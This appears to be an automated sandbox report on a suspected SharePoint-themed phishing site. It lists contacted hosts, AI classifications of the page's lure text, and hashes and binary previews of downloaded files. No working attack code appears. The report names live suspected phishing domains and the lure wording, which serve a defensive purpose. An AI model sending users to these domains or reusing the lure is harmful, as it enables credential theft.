                                      15169GOOGLEUSfalse
                                      35.190.80.1
                                      a.nel.cloudflare.comUnited States
                                      15169GOOGLEUSfalse
                                      35.157.250.3
                                      isteam.wsimg.comUnited States
                                      16509AMAZON-02USfalse
                                      216.58.212.170
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      142.250.185.67
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      104.17.24.14
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      151.101.1.229
                                      jsdelivr.map.fastly.netUnited States
                                      54113FASTLYUSfalse
                                      142.250.185.68
                                      www.google.comUnited States
                                      15169GOOGLEUSfalse
                                      1.1.1.1
                                      unknownAustralia
                                      13335CLOUDFLARENETUSfalse
                                      142.250.186.36
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      23.38.98.114
                                      unknownUnited States
                                      16625AKAMAI-ASUSfalse
                                      104.18.186.31
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      104.18.95.41
                                      challenges.cloudflare.comUnited States
                                      13335CLOUDFLARENETUSfalse
                                      239.255.255.250
                                      unknownReserved
                                      unknownunknownfalse
                                      188.114.97.3
                                      toungeassociates.pages.devEuropean Union
                                      13335CLOUDFLARENETUSfalse
                                      188.114.96.3
                                      trendlifetechdo.ruEuropean Union
                                      13335CLOUDFLARENETUSfalse
                                      104.17.25.14
                                      cdnjs.cloudflare.comUnited States
                                      13335CLOUDFLARENETUSfalse
                                      IP
                                      192.168.2.16
                                      192.168.2.23
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1541684
                                      Start date and time:2024-10-25 01:57:14 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                      Sample URL:http://toungeassociates-sharepoint.com
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:15
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • EGA enabled
                                      Analysis Mode:stream
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal56.phis.win@27/66@48/241
                                      • Exclude process from analysis (whitelisted): svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 142.250.185.227, 142.250.74.206, 74.125.206.84, 34.104.35.123, 199.232.210.172, 216.58.212.170, 142.250.185.67, 23.38.98.114, 23.38.98.78, 2.18.64.20, 2.18.64.8
                                      • Excluded domains from analysis (whitelisted): fonts.googleapis.com, e40258.g.akamaiedge.net, fs.microsoft.com, accounts.google.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, e115443.a.akamaiedge.net, clients2.google.com, edgedl.me.gvt1.com, wildcard.websites.godaddy.com.sni-only.edgekey.net, clients.l.google.com, global-wildcard.wsimg.com.sni-only.edgekey.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • VT rate limit hit for: http://toungeassociates-sharepoint.com
                                      InputOutput
                                      URL: https://toungeassociates-sharepoint.com/ Model: claude-3-haiku-20240307
                                      ```json
                                      {
                                        "contains_trigger_text": true,
                                        "trigger_text": "You are accessing a secured SharePoint file",
                                        "prominent_button_name": "REVIEW COMPLETED DOCUMENTS",
                                        "text_input_field_labels": "unknown",
                                        "pdf_icon_visible": false,
                                        "has_visible_captcha": false,
                                        "has_urgent_text": false,
                                        "has_visible_qrcode": false
                                      }
                                      URL: https://toungeassociates-sharepoint.com/ Model: claude-3-haiku-20240307
                                      ```json
                                      {
                                        "brands": [
                                          "Tounge Associates"
                                        ]
                                      }
                                      URL: https://toungeassociates.pages.dev/ Model: claude-3-haiku-20240307
                                      ```json
                                      {
                                        "contains_trigger_text": true,
                                        "trigger_text": "You are accessing a secured SharePoint file",
                                        "prominent_button_name": "REVIEW COMPLETED DOCUMENTS",
                                        "text_input_field_labels": "unknown",
                                        "pdf_icon_visible": false,
                                        "has_visible_captcha": false,
                                        "has_urgent_text": false,
                                        "has_visible_qrcode": false
                                      }
                                      URL: https://toungeassociates.pages.dev/ Model: claude-3-haiku-20240307
                                      ```json
                                      {
                                        "brands": [
                                          "Tounge Associates"
                                        ]
                                      }
                                      URL: https://toungeassociates.pages.dev/ Model: claude-3-haiku-20240307
                                      ```json
                                      {
                                        "contains_trigger_text": false,
                                        "trigger_text": "unknown",
                                        "prominent_button_name": "Read More",
                                        "text_input_field_labels": "unknown",
                                        "pdf_icon_visible": false,
                                        "has_visible_captcha": false,
                                        "has_urgent_text": false,
                                        "has_visible_qrcode": false
                                      }
                                      URL: https://toungeassociates.pages.dev/ Model: claude-3-haiku-20240307
                                      ```json
                                      {
                                        "brands": [
                                          "Classic Cars",
                                          "Modern Supercars",
                                          "Electric Vehicles"
                                        ]
                                      }
                                      URL: https://trendlifetechdo.ru//#services Model: claude-3-haiku-20240307
                                      ```json
                                      {
                                        "contains_trigger_text": false,
                                        "trigger_text": "unknown",
                                        "prominent_button_name": "Learn More",
                                        "text_input_field_labels": "unknown",
                                        "pdf_icon_visible": false,
                                        "has_visible_captcha": false,
                                        "has_urgent_text": false,
                                        "has_visible_qrcode": false
                                      }
                                      URL: https://trendlifetechdo.ru//#services Model: claude-3-haiku-20240307
                                      ```json
                                      {
                                        "brands": [
                                          "Aficionados of Fine Vehicles"
                                        ]
                                      }
                                      URL: https://trendlifetechdo.ru//# Model: claude-3-haiku-20240307
                                      ```json
                                      {
                                        "contains_trigger_text": false,
                                        "trigger_text": "unknown",
                                        "prominent_button_name": "Learn More",
                                        "text_input_field_labels": "unknown",
                                        "pdf_icon_visible": false,
                                        "has_visible_captcha": false,
                                        "has_urgent_text": false,
                                        "has_visible_qrcode": false
                                      }
                                      URL: https://trendlifetechdo.ru//# Model: claude-3-haiku-20240307
                                      ```json
                                      {
                                        "brands": [
                                          "Aficionados of Fine Vehicles"
                                        ]
                                      }
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 22:57:46 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2673
                                      Entropy (8bit):3.9829253434614507
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:94F690E7EB0B250A7AA0E25622B9001E
                                      SHA1:191172C3D2B638407F908E65B0827438EEC49251
                                      SHA-256:44A6B5DD4A538998C3D2EC219AE2A0581E28F7E35E1F94AFF6C46F7F139BAA7B
                                      SHA-512:E1E195497975B2B34A94E6241D06A094A37D95D2541570804A95C474AF3DD9A4B4D82842CB68B14B3319D46A57482930FFDB0602D6643C12B8D7BCE9F03AC724
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,.....|=.p&..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY6.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY6.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY6............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY8............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 22:57:46 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2675
                                      Entropy (8bit):3.997978057316383
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:02693851CE5757EFF0607612D31151E2
                                      SHA1:E5E6B00C2066FB553C5483EFE817EFB68332B521
                                      SHA-256:AD901AEA16D8A63770CDE38D599906631FAD9D22337EC8AE1B26A2FBA6A055AF
                                      SHA-512:0480C2BF9744EFBBB1B4EB93ED67CB80CED59F8218BDBEAC1A31DEC9C16E89091B82FB2F3FDF47E15691CFBC79ABD7EE1E9FEF46647C4ADB31A2B472BA2367F0
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,......0.p&..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY6.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY6.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY6............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY8............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2689
                                      Entropy (8bit):4.006668804056553
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:5643EF3E7B3D7DCFA3F403DA6DF71505
                                      SHA1:79F7D4E2BF11CFF15A52696BCDC2A3E84F8B0C5F
                                      SHA-256:171E1DF92E274168B3ECA6A7C1D28914CD522D86F1B0093350427E5E21592558
                                      SHA-512:96B3ACF65C57959EDFBD7B773D7394B756D991ADAAE016D644E234E9FCAF2B47A812E790C495C5E2B5D4C1D5B187B2D765B18F89AF67E8DDC86DF44E65A530C0
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY6.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY6.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY6............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 22:57:46 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2677
                                      Entropy (8bit):3.995568410733896
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:642EC14EC9308925F50872770A6A0CFC
                                      SHA1:78A82A12FA9F21134D580112455D0FC1F16738BE
                                      SHA-256:38F6169F1C30A8F5904BD3668B2A95151F8C81E16FD88E1D71FAADE0775C0B5A
                                      SHA-512:418F6D28C5CDF389DCCCF75D624561FA7ADDDD6FDDB692E6EC741CDA79107EE993EFCE1695AEAF5F5281AD68BC514D2F293A174DF3C02DBF823DA98FEDBDE004
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,....%.+.p&..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY6.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY6.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY6............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY8............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 22:57:46 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2677
                                      Entropy (8bit):3.9847837231384666
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:1E0242C0471E3DEBB2BD02742B9663F1
                                      SHA1:D5954FF10E07ECC5BAE8E6CC41020559F954BDD8
                                      SHA-256:260290CAC5F623FC3E56892E0CBE969CC5E70553B2082381F5C93FD11833B488
                                      SHA-512:8EF1F2856E7A50F885ECBD300FC9CB5363223E3426579C8D0380EE2A4A5DD10D967CEB271B8A3E90A26D159EAA5186A86720EEB3853725976EC2A04A623DE2F1
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,....B.7.p&..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY6.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY6.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY6............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY8............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 22:57:46 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2679
                                      Entropy (8bit):3.9925717752045466
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:951153257B6483F09DD1D1ED5CC4D905
                                      SHA1:DA2947BCB747EF3DBEDFC2B81A29D52ECF610A8E
                                      SHA-256:E10854AD9A9A2253D8DDE301F7D1ECA0D6F32AB02D2A8A2710B2F2826FB3C372
                                      SHA-512:A2506143EED2C0E5A0C185DB17110FE0125E29D6515CB07DEAB6941DA65502EF90BB77182F13A441CA235A67A9C3B03DD87377C88D80302A238C35FE45199C14
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,........p&..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY6.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY6.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY6............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY8............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x316, components 3
                                      Category:dropped
                                      Size (bytes):22492
                                      Entropy (8bit):7.937803505031127
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:F68413067EDD111FBCB70F39E52E4C6A
                                      SHA1:A3D806867CB62B898A8268100D050D737FF86F98
                                      SHA-256:FE8B100AD722F0F6BAA51CCB34C5A43A8A2C77F01F218FC32CDD0D0A7C322AAB
                                      SHA-512:B02330F9E77E2B273D57459E0E2D0FF6C3875A4C3351A9EC30313377D3A35CC13D1872983C66A441AD148C03CCF9915F82B7FC58AAE849EE03780AE4AFDC5848
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:......JFIF.............BExif..MM.*.......i................@...........@....................C.......................................%..%....)).%756.*2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......<...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...:...O..0.~.e......$....N.J.#.3KQme....a.g.N..Q.4:.......:..L.E%!.IG?..3@...QH....P.QK.0h..QE..9...%.....'u.....%.......P+..$.i....U.W_q...D........$.........'.1.n$}j64.8..Bh....U..7.....OS.5HLJ)i*..(...(...(.aE.P.E.P.E.P ..).(....J)h. ...b..R.H....../kn....S..W{I..eo..o..Lj.Rd.....!..Cp.......
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                      Category:downloaded
                                      Size (bytes):1249
                                      Entropy (8bit):5.242453121762845
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:F58515DFE987F7E027C8A71BBC884621
                                      SHA1:BEC6AEBF5940EA88FBBFF5748D539453D49FA284
                                      SHA-256:679E7E62B81267C93D0778083AE0FD0EFE24172FF0AC581835B54165B3D9ED43
                                      SHA-512:F085346A38318F7935D76909DB0367862924CC9B0D96256F7FF4E8999C041E610BBCDE8CA56C92673BDE0991C85E9C9D9B6726ABD91D0C3177462C80D4A99140
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://trendlifetechdo.ru/favicon.ico
                                      Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.<title> 404 Not Found..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>.<h2 style="margin-top:20px;font-size: 30px;">Not Found..</h2>.<p>The resource requested could not be found on this server!</p>.</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:data
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.938818448280562
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:44CADCD88EE0F08D686C30D45929699C
                                      SHA1:02C8D710DFF5A9A4674224CAC91E88EFBA81CA1E
                                      SHA-256:766444E2A09B6F7BE3F4F31156BABD88DED95185653605152308FDAA3D267A4C
                                      SHA-512:5A83357FAA86F860E970FD656816232EF0D4FB082A7C2643646A1355D593D2ABACEADFC6393BC79EEC5C8E48BB2966D87F6228072E35253B1B947E960B9439B1
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:19
                                      Preview:.`......b..D..{rK.:.......(./.G.......w..".L...(}z..] O....w`...+9.W..H.F.......6...8*5..A.T+.^.....q....T'}.B..qEkfm.....E...exF.K...`7.....~../{{.Rn......1#.}!Y.J.di.I..:.c2.z|..U..\.#1{.ek...4.H....b...w....U...4z.. ..".F.8%.."Z.^.'.e....L..6......j.B.z.g&.D.~;,b1..AGZ.N....4$[WRjscC....U...\..T!....Z.fQe+......8W.Y.E.:+Z4.c+........./....Ck.......&.S.I.=.....9......\...J..Rw.1..g.U.}:..lz..,E.9.....C.?>L.?.....2.q...xx..r..,...."+......v......W2......&....:*..a.."..p.....>./1.i.....xS..B.9.&Y..v0.....>....~...c?.a..H....K......b..E.*.@..'.~.y...PT..hH.8..M...X.....G....x.,@.z..........,!.&...5..`[.*......"R......<t9...JaZ..{..t.v...^.)j..k......eUU.&..`8L..t.\>G..E`.....}e...p.....d .J.D.(......V..1pY.q}....SR{q.G_......k$.64Hw.5u.*..U&UlR..o.c..........I....1....]..J~i.l.rs.Q..I.z*,."%..q.ox22....S3...a.N_.q8.T..4<W<z..^..}t.9..-$h..s.:....a.....GR...._Ab5.(...S..?.{gi.]..Dgn...y2...f.b"..U@q4...%..3r.. .../...=T..v.Q1.dH....x....DUe."
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (47992), with no line terminators
                                      Category:downloaded
                                      Size (bytes):47992
                                      Entropy (8bit):5.605846858683577
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:CF3402D7483B127DED4069D651EA4A22
                                      SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                      SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                      SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:DOS executable (COM, 0x8C-variant)
                                      Category:downloaded
                                      Size (bytes):1048576
                                      Entropy (8bit):7.884884120666017
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:FABD09B0CE40F081592C8EF30EBC8747
                                      SHA1:3338D34ABC1365D90D6EE657BE2C97773C3949FC
                                      SHA-256:4C33C92894BA3FAD85AF7A361588DD945E4468CA750C4AFBEDC69AF3B01CCDBA
                                      SHA-512:9CF184B896CDEB56F18E8FB4497096D4F6E8A549A430ACB508B53D7D388767A4DE476000BD853F6CF19AC50CF294ECD07BB9BA64E9874C61E800A78782F8AEE3
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      URL:https://websites.godaddy.com/categories/v4/videos/raw/video/uA41GmyyG8IMaxXdb:2f83d80d859def:2
                                      Preview:.K.}\BM....\...o...Kk....XL-?.J}..%.).BiA...2....n:.H...Y..o......st....ev:.s......"L....F.~z..".M=.c..'.yB..,f|.`..[......y.&.mi.m.a.3.r...:5Z.[5.M.Fk.$]G.^... I.e.q^..'.........Gt.....%.?l6...^.....i.6I?3xZ.....Vy1...Z.....g..?..@.!..F0.e..RBv..-.(^.j...o@.G......f....xsS..'27g\.x...).\[NC.~.._y J..T..`.p..9q.[........<Hs.....U..9.?..=j$..kn.v.j...].n..<./.........GC...#5.D....6.I.?`.h...G4.$.JUi.R.^.....<......U.;....w).aA.]..S...x3....w?eV......&.c"..P..Tz.1*.s..-{....]`Q..2..k.I.Ic..VB..l..!.x..n...Y...x.6........o...F..H..{...... ..E.a.m....V.Z...f...........)X.y.TF&......W.\v.Z(|.z.J,s..IR.....m..q,Hpd...hY6.JQ..:......F/!K..qPU...../,.Xd....+...q&.}.<M'|qnn`..h...9H.p,..H............No.>.....1:~4<..U..._`...S..>.+6....S..COQ......j.!.^j.<{....L..w..J.PWL2Q....e...#..:.}.i....i...x.v. .....d%.:...j..Yx..5uW*....JO..O..H.!..8....YJ .c};....g.........q.Oh.,......j...2=.....WN.y......;}.P+...~.D..Bv..r...a.....$%./.dk...e.(~...1.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (32942), with no line terminators
                                      Category:downloaded
                                      Size (bytes):32942
                                      Entropy (8bit):5.23182226037667
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:3990853BDD81138505DD29E9DC842D08
                                      SHA1:CB2FFE83B17EBB2157B89F261650D6C51B428DF3
                                      SHA-256:8D7EA3522FE33A39E1121A3C04F3F4145B3B6AFF2FB7BB84EE119E7DA131A8A9
                                      SHA-512:D098DBFD1D157C91769FB0F62FDE56FCDF3D15D5A798FBCEC20E8291208F6B6D4E1616448B52F4F72D3F59A0C74428CAEA4BC8E774FC9922A308CE4823FDFB59
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://toungeassociates-sharepoint.com/sw.js
